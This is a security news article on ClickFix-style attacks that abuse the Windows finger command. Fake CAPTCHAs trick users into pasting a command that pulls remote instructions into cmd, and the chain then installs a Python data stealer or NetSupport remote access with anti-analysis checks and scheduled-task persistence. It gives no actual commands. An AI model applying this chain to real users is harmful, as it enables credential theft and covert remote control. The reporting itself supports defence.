Redazione RHC : 26 November 2025 07:20
A nearly forgotten service command has returned to prominence after being spotted in new Windows device infection patterns. For decades considered a relic of the early days of the internet, the mechanism is now being used in attacks disguised as harmless controls and queries offered to victims in a Command Prompt window.
The finger command, once designed to retrieve user information on Unix and Linux servers, was also present in Windows. It returned the account name, home directory, and other basic information. While the protocol is still supported, its use has largely disappeared . However, for attackers, this actually represents an advantage: few would expect to see network activity through such a channel.
Recent observations have shown that finger has begun to be used in ClickFix-like schemes, in which commands to be executed on the device are downloaded from a remote source. Experts have long noted that the command can act as a Windows support tool and be used to download malicious data.
It was in these new campaigns that the method was further developed. The MalwareHunterTeam team provided an example batch file that accessed a remote server via finger and sent the resulting output directly to cmd for execution. The domains involved in this activity are no longer accessible, but researchers have discovered other examples of the same approach.
The first victims posted on Reddit: in one thread, a user described encountering a fake CAPTCHA that required them to open a startup window and enter a command to verify their identity. The entered string initiated a “finger” request to another server and passed the resulting output to a Windows interpreter.
As a result, a temporary directory was created, the system program curl was copied under a random name, an archive disguised as a PDF was downloaded, and a set of Python files was unzipped. The program was then launched via pythonw.exe, after which a request was made to the attackers’ server, and a fake “verification” message was displayed on the screen.
The archive’s contents indicated a data theft attempt. At the same time, MalwareHunterTeam also discovered other activity: the finger command was being used to download a nearly identical set of commands, but with additional checks. Before executing its actions, the script searched the computer for malware analysis tools, from Process Explorer and Procmon to Wireshark, Fiddler, and debuggers. If such tools were detected, execution was terminated.
Since no such tools were found, a new archive was downloaded and unzipped, also disguised as a PDF document . This time, it contained the NetSupport Manager remote administration package. After unzipping, a series of commands configured the task scheduler to start remote access the next time the system logged on.
Redazione